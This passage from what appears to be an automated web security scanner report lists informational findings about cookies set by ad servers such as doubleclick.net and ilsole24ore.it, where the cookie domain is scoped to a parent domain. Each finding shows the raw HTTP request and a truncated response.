The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098;sz=728x90;click0=http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/1419684132/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626633303930?;ord=1419684132? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 22:31:04 GMT
Expires: Mon, 02 May 2011 22:31:04 GMT
Cache-Control: private
Content-Length: 5973

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

14.13. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/els.SDguest/ISSNgeneral

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/els.SDguest/ISSNgeneral;ISSN=general;pg=unknown;dcopt=ist;;tile=1;sz=728x90,1000x50;ord=5567342749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 23:54:10 GMT
Expires: Mon, 02 May 2011 23:54:10 GMT
Cache-Control: private
Content-Length: 244

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afb/0/0/%2a/j;44306;0-0;0;58712962;3454-728/90;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0
...[SNIP]...

14.14. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /ad/tiscaliadv.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1
Host: ad78.neodatagroup.com
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml"
Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT
Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com;
Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 758
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close

var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g
...[SNIP]...

14.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:39 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 37380
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'BackGround') {
document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e
...[SNIP]...

14.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adv.ilsole24ore.it
Cookie: RMID=adc1d6f34dbf3090

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:01 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1dtO10CUN; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 14822
Connection: close
Content-Type: image/gif

GIF89a..Z.............gs...ZWXpmn...$"$,+,.................#.&*%-84;2.6.. `_aB>Gfam
..%"+...GEK,)3<9C.....PNZGET.....'....%%100>...&&(...........................OQmjn~..................bjv......f
...[SNIP]...

14.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUG088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:17:36 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUI088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUD088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUE088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUI088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:30:08 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUK088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.20. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUK088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:42:39 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUM088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.21. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUJ088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:36:23 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUL088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.22. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUH088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:23:52 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUJ088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.23. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUC088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:53:53 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUD088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.24. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:06 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1ROU1088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.25. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUF088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:11:18 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUH088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.26. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

